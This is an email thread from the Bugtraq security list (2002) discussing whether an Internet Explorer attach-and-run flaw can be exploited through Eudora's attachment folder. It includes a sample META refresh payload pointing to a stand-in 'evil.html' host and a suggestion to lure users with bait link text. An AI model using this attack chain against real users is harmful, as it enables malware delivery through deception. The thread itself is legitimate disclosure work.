I just downloaded and installed Eudora 5.1 from the vendor's site and tested.

Eudora does indeed store any attachments in its "attach" directory, which in my case was "C:\Program Files\Qualcomm\Eudora\attach". This happened at the moment of arrival, before I even opened the email.

However, Eudora is not directly subject to this exploit - all <OBJECT> and <SCRIPT> tags are automatically filtered out before rendering the HTML email. Furthermore, the default install of Eudora seems to run with any scripting disabled in its HTML rendering.

So far this is very promising and a nice touch by Qualcomm, and does indeed eliminate the possibility of an automated attach-and-run virus. Even when embedding an automated refresh in the HTML that forces the preview pane to a new page (e.g. <META HTTP-EQUIV="Refresh" CONTENT="1;URL=http://your.tld/evil.html">), Eudora will not execute any scripting or ActiveX in "evil.html".

Still, all you need to do from here is a bit of social engineering ("Free porn that way! -->") to convince the user that he must click on the link to your site (containing the exploit code). When the user clicks a link in Eudora, it's opened in his browser instead of inside the preview pane, and the exploit code can then run automatically.

Regards
Thor Larholm
Jubii A/S - Internet Programmer

-----Original Message-----
From: RT [mailto:roelof@sensepost.com]
Sent: 16. marts 2002 01:59
To: Thor Larholm
Cc: 'Eric Detoisien'; bugtraq@securityfocus.com
Subject: RE: MSIE vulnerability exploitable with IncrediMail

Immm... Eudora Mail .. automatically saves attachments in <drive>:\program files\qualcomm\eudora\attachments .. right? The (very old) version (4.1) that I have sure does that. And even if you delete the email itself (after opening), or right click on the file and select delete - the file stays.

So, you just need to get the file in there and have the user visit a corrupted web .. and hey.. presto!

Just my 2c on this,
Roelof.

On Fri, 15 Mar 2002, Thor Larholm wrote:

+Isn't {42D00B20-479C-11d4-9706-00105A40931C} a GUID for your user account,
+and as such unknown from time to time, making the proposed exploit
+unfeasible?
+
+
+Regards
+Thor Larholm
+Jubii A/S - Internet Programmer
+
+

------------------------------------------------------
Roelof W Temmingh
SensePost IT security
roelof@sensepost.com
+27 83 448 6996
http://www.sensepost.com
http://www.hackrack.com